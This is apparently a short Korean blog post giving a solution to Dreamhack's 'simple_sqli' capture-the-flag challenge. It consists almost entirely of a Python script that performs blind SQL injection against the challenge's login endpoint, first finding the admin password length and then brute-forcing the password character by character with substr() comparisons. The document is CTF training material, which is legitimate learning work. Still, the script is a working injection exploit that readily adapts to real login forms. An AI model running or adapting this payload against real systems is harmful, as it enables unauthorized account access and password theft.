[Dreamhack] blind sql injection

dreamhack의 simple_sqli를 blind sql injection으로 풀어보았다.

import requests

URL="http://host3.dreamhack.games:11344/login"

#비밀번호 길이
password_length = 0
'''
def binsearch(low: int, high: int):
    while 1:
        mid = (low + high) // 2
        if low + 1 >= high:
            break
        data = {"userid" : f"admin\" and length(userpassword) < {mid} -- ", "userpassword" : 1}
        r = requests.post(URL, data=data)
        if "admin" in r.text:
            high = mid
        else:
            low = mid
    return mid

print(binsearch(0, 100))
'''


while True:
    password_length+=1
    data = {"userid" : f"admin\" and length(userpassword) = {password_length} -- ", "userpassword" : 1}
    r = requests.post(URL, data=data)

    if "admin" in r.text:
        print(password_length)
        break

list = "1234567890abcdefghijklmnopqrstuvwxyz"
pw =""

for i in range(1, password_length+1):
    for j in list:
        uid = f'admin" and substr(userpassword, {i}, 1) = \'{j}\' -- '
        data = {"userid" : uid, "userpassword" : 1}
        r = requests.post(URL, data=data)
        if "admin" in r.text:
            pw += j
            print(pw)
            break

print(pw)